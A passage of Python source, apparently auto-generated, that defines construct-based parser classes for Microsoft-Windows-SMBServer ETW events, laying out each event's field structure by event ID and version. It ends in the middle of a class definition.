"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"LeaseFlags" / Int32ul,
"CurrentLeaseState" / Int32ul,
"NewLeaseState" / Int32ul,
"BreakReason" / Int32ul,
"AccessMaskHint" / Int32ul,
"ShareMaskHint" / Int32ul,
"LeaseKey" / Guid,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=15, version=2)
class Microsoft_Windows_SMBServer_15_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"LeaseFlags" / Int32ul,
"LeaseState" / Int32ul,
"LeaseDuration" / Int64sl,
"LeaseKey" / Guid,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=16, version=2)
class Microsoft_Windows_SMBServer_16_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid,
"LockCount" / Int16ul,
"Locks" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=17, version=2)
class Microsoft_Windows_SMBServer_17_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"FileId" / Int64ul,
"ControlCode" / Int32ul,
"IoctlFlags" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=18, version=2)
class Microsoft_Windows_SMBServer_18_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"FileInformationClass" / Int8ul,
"QueryDirectoryFlags" / Int8ul,
"FileIndex" / Int32ul,
"FileId" / Int64ul,
"OutputBufferLength" / Int32ul,
"NameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.NameLength),
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=19, version=2)
class Microsoft_Windows_SMBServer_19_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"ChangeNotifyFlags" / Int16ul,
"FileId" / Int64ul,
"OutputBufferLength" / Int32ul,
"CompletionFilter" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=20, version=2)
class Microsoft_Windows_SMBServer_20_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"InfoType" / Int8ul,
"InfoClass" / Int8ul,
"OutputBufferLength" / Int32ul,
"SecurityInformation" / Int32ul,
"QueryInfoFlags" / Int32ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=21, version=2)
class Microsoft_Windows_SMBServer_21_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"InfoType" / Int8ul,
"InfoClass" / Int8ul,
"SecurityInformation" / Int32ul,
"FileId" / Int64ul,
"OutputBufferLength" / Int32ul,
"OutputBuffer" / Bytes(lambda this: this.OutputBufferLength),
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=101, version=2)
class Microsoft_Windows_SMBServer_101_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"SecurityMode" / Int16ul,
"DialectRevision" / Int16ul,
"Capabilities" / Int32ul,
"MaxTransactSize" / Int32ul,
"MaxReadSize" / Int32ul,
"MaxWriteSize" / Int32ul,
"SystemTime" / Int64ul,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=102, version=2)
class Microsoft_Windows_SMBServer_102_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"SessionFlags" / Int16ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=103, version=2)
class Microsoft_Windows_SMBServer_103_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=104, version=2)
class Microsoft_Windows_SMBServer_104_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ShareType" / Int8ul,
"ShareFlags" / Int32ul,
"Capabilities" / Int32ul,
"MaximalAccess" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=105, version=2)
class Microsoft_Windows_SMBServer_105_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=106, version=2)
class Microsoft_Windows_SMBServer_106_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=108, version=2)
class Microsoft_Windows_SMBServer_108_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"OplockLevel" / Int8ul,
"CreateAction" / Int32ul,
"CreationTime" / Int64ul,
"LastAccessTime" / Int64ul,
"LastWriteTime" / Int64ul,
"LastChangeTime" / Int64ul,
"AllocationSize" / Int64ul,
"EndOfFile" / Int64ul,
"FileAttributes" / Int32ul,
"FileId" / Int64ul,
"CreateContextsCount" / Int32ul,
"LeaseKey" / Guid,
"LeaseLevel" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=109, version=2)
class Microsoft_Windows_SMBServer_109_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"CloseFlags" / Int16ul,
"CreationTime" / Int64ul,
"LastAccessTime" / Int64ul,
"LastWriteTime" / Int64ul,
"ChangeTime" / Int64ul,
"AllocationSize" / Int64ul,
"EndOfFile" / Int64ul,
"FileAttributes" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=110, version=2)
class Microsoft_Windows_SMBServer_110_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=111, version=2)
class Microsoft_Windows_SMBServer_111_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"LengthRead" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=112, version=2)
class Microsoft_Windows_SMBServer_112_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"LengthWritten" / Int32ul,
"Remaining" / Int32ul,
"WriteChannelInfoOffset" / Int16ul,
"WriteChannelInfoLength" / Int16ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=113, version=2)
class Microsoft_Windows_SMBServer_113_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"OplockLevel" / Int8ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=115, version=2)
class Microsoft_Windows_SMBServer_115_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"LeaseFlags" / Int32ul,
"LeaseState" / Int32ul,
"LeaseDuration" / Int64sl,
"LeaseKey" / Guid,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=116, version=2)
class Microsoft_Windows_SMBServer_116_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=117, version=2)
class Microsoft_Windows_SMBServer_117_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ControlCode" / Int32ul,
"IoctlFlags" / Int32ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=118, version=2)
class Microsoft_Windows_SMBServer_118_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=119, version=2)
class Microsoft_Windows_SMBServer_119_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=120, version=2)
class Microsoft_Windows_SMBServer_120_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"OutputBufferLength" / Int32ul,
"OutputBuffer" / Bytes(lambda this: this.OutputBufferLength),
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=121, version=2)
class Microsoft_Windows_SMBServer_121_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=122, version=2)
class Microsoft_Windows_SMBServer_122_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=200, version=0)
class Microsoft_Windows_SMBServer_200_0(Etw):
pattern = Struct(
"ComponentId" / Int32ul,
"LineNumber" / Int32ul,
"FunctionNameLength" / Int16ul,
"FunctionName" / Bytes(lambda this: this.FunctionNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=201, version=0)
class Microsoft_Windows_SMBServer_201_0(Etw):
pattern = Struct(
"WorkItem" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=202, version=0)
class Microsoft_Windows_SMBServer_202_0(Etw):
pattern = Struct(
"WorkItem" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=500, version=0)
class Microsoft_Windows_SMBServer_500_0(Etw):
pattern = Struct(
"ConnectionGUID" / Guid,
"AddressLength" / Int32ul,
"Address" / Bytes(lambda this: this.AddressLength),
"TransportLength" / Int32ul,
"TransportName" / Bytes(lambda this: this.TransportLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=501, version=0)
class Microsoft_Windows_SMBServer_501_0(Etw):
pattern = Struct(
"ConnectionGUID" / Guid,
"Flags" / Int32ul,
"AddressLength" / Int32ul,
"Address" / Bytes(lambda this: this.AddressLength),
"TransportLength" / Int32ul,
"TransportName" / Bytes(lambda this: this.TransportLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=502, version=0)
class Microsoft_Windows_SMBServer_502_0(Etw):
pattern = Struct(
"ConnectionGUID" / Guid,
"Reason" / Int32ul,
"Status" / Int32ul,
"AddressLength" / Int32ul,
"Address" / Bytes(lambda this: this.AddressLength),
"TransportLength" / Int32ul,
"TransportName" / Bytes(lambda this: this.TransportLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=550, version=0)
class Microsoft_Windows_SMBServer_550_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=551, version=0)
class Microsoft_Windows_SMBServer_551_0(Etw):
pattern = Struct(
